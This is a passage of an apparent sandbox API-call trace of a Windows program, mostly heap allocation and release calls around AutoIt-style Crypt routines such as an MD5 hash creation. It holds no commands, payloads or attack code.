[0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0159.007] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0159.007] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0159.007] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0159.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.007] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.008] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0159.008] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0159.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0159.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0159.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.009] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0159.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0159.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.009] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0159.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0159.010] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0159.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0159.010] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0159.010] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0159.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0159.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0159.011] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0159.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0159.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0159.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50a28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0159.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0159.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0159.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0159.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0159.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0159.012] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0159.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0159.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0159.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0159.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0159.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0159.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0159.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0159.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0159.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0159.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0159.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.037] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0159.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e18 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0159.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0159.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0159.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0159.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0159.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0159.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.039] RtlAllocateHeap 